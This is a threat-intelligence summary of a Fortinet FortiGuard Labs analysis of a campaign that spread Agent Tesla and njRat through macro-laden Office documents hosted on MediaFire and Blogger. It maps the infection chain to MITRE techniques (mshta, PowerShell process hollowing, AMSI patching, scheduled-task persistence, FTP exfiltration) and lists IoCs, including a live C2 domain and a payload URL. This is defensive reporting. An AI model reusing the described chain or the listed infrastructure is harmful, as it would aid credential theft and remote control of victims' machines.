Fortinet FortiGuard Labs analyzed malicious Microsoft Office documents that abused legitimate sites MediaFire and Blogger to deliver two malware variants: Agent Tesla and njRat (Bladabindi). The operation uses a multi-stage chain—VBA macros, mshta, and PowerShell with process hollowing—to steal credentials, capture data, and exfiltrate via FTP.
Keypoints
- Threat actors delivered two malware families (Agent Tesla and njRat/Bladabindi) using compromised Office documents hosted on legitimate sites (MediaFire and Blogger).
- Initial access relies on macro-enabled Office documents with Auto_Open triggers to execute the payloads.
- Stage 2 uses mshta to reach a malicious URL on MediaFire and to drop subsequent components.
- Stage 3 employs PowerShell and process hollowing to load the final payloads while encoding/obfuscating code to hinder analysis and bypass AMSI.
- Final payloads include Agent Tesla (credential/ data theft with FTP exfiltration) and njRAT (remote control/monitoring with obfuscated code).
- IoCs include multiple SHA-256 hashes, a C2/FTP server, and domain names associated with the campaign; Fortinet provides detections and defender guidance.
MITRE Techniques
- [T1566.001] Spearphishing Attachment – ‘phishing emails and lure office documents are always an efficient way to spread this malware.’
- [T1059.005] Visual Basic – ‘the code is automatically triggered because it uses the “Auto_Open()” function.’
- [T1218.005] Mshta – ‘the mshta process started right after clicking “Enable Macros” in the document.’
- [T1105] Ingress Tool Transfer – ‘to download payloads from the MediaFire site’ and ‘1.htm downloaded from MediaFire’
- [T1027] Obfuscated/Compressed Files and Information – ‘the main malware and part of the code are encoded and replaced with strings to increase the difficulty of analysis.’
- [T1055.012] Process Hollowing – ‘The PowerShell script in “1.txt” delivered its final payload via the process hollowing technique.’
- [T1059.001] PowerShell – ‘PowerShell script… delivers its final payload’ and ‘The PowerShell section… bypasses AMSI’ (see AMSI entry)
- [T1562.001] Impair Defenses – ‘disables logging and bypasses AMSI by patching it.’
- [T1053.005] Scheduled Task – ‘adds persistence by creating a scheduled task.’
- [T1112.001] Modify Registry – ‘it adds to the registry in “HKEY_CURRENT_USER” with name “di” and data “!”.’
- [T1082] System Information Discovery – ‘collects the victim device’s information… and MD5 hash for this data.’
- [T1555.003] Credentials from Web Browsers – ‘Agent Tesla uses a typical application list to steal login credentials, cookies, mail information, and VPN data.’
- [T1041] Exfiltration Over C2 Channel – ‘sends this data via FTP protocol using hardcoded IP.’
Indicators of Compromise
- [Domain] mobnew6565.duckdns.org – C2 domain used for data exfiltration.
- [Domain] www.webclientservices.co.uk – Command/Control hosting domain referenced in the HTML shown to deliver payloads.
- [URL] http://www.webclientservices.co.uk/p/1.html – Page used to host or deliver scripts and payloads.
- [File] NGCwje.exe – Filename used for persistence on the victim machine.
- [File] Windows – Lure filename used in startup/ Templates directory to appear legitimate.
- [Hash] 9cb3a21f90dbb0dc5f3054a05571d8f2b5c2c06e0d24be4ec3a313cb7a061a60, 63f13715d7c962f7eb36fe4cc7dbdbae1b599133ce2867bb346c11a61fac0990
- [Hash] a44196d6b73d49ed6712df37fabd0e2b11d2bd91458c0351b6c7401e285b8a49, 1844081002dc04a0e236503c233be07d7a0b6024c829fd0620f63075bb6a011a
- [Hash] a0931ce734fcc865c90fa7e9004bea8db551c32c699fdd389213c59cde3832cd, bdb94f7c3a13ea102258540f372d4ae07a4d4943f0ae9324f44fdfa8481bfaf2
- [Hash] 39e67f25b0fa660db0541bf37e315fb4def772bd3b6d67991b64a5a85914477d